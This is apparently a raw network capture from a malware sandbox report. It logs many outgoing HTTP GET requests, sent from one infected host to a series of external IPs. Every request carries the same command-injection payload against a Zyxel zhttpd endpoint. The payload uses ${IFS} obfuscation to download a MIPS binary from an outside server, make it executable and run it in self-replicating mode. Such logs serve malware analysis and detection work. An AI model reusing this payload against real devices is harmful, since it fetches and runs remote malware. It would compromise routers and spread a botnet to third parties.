                                        Jan 14, 2024 16:18:39.333971977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2857192.168.2.133945620.232.231.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334006071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2858192.168.2.1348370174.101.237.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334105968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2859192.168.2.1351248162.122.122.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334131002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2860192.168.2.1333968163.182.94.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334206104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2861192.168.2.1348414155.64.200.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334264040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2862192.168.2.1346458180.250.131.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334317923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2863192.168.2.1336428142.89.206.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334393024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2864192.168.2.1345356204.163.242.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334418058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2865192.168.2.1334692142.138.133.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334501982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2866192.168.2.135391896.214.11.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334532022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2867192.168.2.133800260.225.91.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334573030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2868192.168.2.135895496.81.39.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334639072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2869192.168.2.1339734160.203.102.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334675074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2870192.168.2.1336818115.126.201.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334757090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2871192.168.2.1358722128.143.152.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334810972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2872192.168.2.1338688102.126.208.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334851027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2873192.168.2.1337270104.207.121.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.334925890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2874192.168.2.13391401.92.255.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335016012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2875192.168.2.134029457.228.181.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335027933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2876192.168.2.1341748166.250.101.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335063934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2877192.168.2.1334210134.14.138.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335167885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2878192.168.2.1350996199.169.161.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335191011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2879192.168.2.1352986134.146.224.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335241079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2880192.168.2.1348228139.153.208.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335313082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2881192.168.2.134605485.237.100.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335359097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2882192.168.2.1359124153.92.113.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335407972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2883192.168.2.135632465.219.97.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335444927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2884192.168.2.1347398174.5.237.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335495949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2885192.168.2.1346030216.154.178.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335552931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2886192.168.2.1346924102.145.154.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335583925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2887192.168.2.134800271.85.188.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335627079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2888192.168.2.1350444202.117.91.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335692883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2889192.168.2.1351544195.116.11.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335740089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2890192.168.2.1343656145.51.191.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335835934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2891192.168.2.135409051.53.182.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335869074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2892192.168.2.1347032124.115.211.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335869074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2893192.168.2.1344242121.240.20.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335912943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2894192.168.2.134409487.115.156.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.335963011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2895192.168.2.133338477.106.75.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336025000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2896192.168.2.1333286149.208.1.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336082935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2897192.168.2.134187823.97.62.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336149931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2898192.168.2.1353796201.187.120.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336206913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2899192.168.2.133892252.249.239.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336260080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2900192.168.2.1337212139.34.20.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336302996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2901192.168.2.135328077.195.90.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336368084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2902192.168.2.1352138179.251.95.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336412907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2903192.168.2.1348900124.200.99.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336448908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2904192.168.2.1348820205.146.207.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336513042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2905192.168.2.1343972201.46.93.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336564064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2906192.168.2.1358528108.87.239.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336601019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2907192.168.2.135958452.44.160.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336627007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2908192.168.2.134151812.19.220.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336672068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2909192.168.2.136018448.255.24.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336740971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2910192.168.2.135192686.120.239.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336812019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2911192.168.2.134264649.255.129.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336849928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2912192.168.2.1345586164.234.150.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336954117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2913192.168.2.1348544103.164.67.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.336993933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2914192.168.2.1339932195.202.168.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337034941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2915192.168.2.1338206198.140.172.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337105989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2916192.168.2.1337380181.171.50.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337174892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2917192.168.2.1335532178.124.90.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337228060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2918192.168.2.1336844101.118.113.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:39.337270975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2919192.168.2.135956020.99.99.172443
                                        TimestampBytes transferredDirectionData
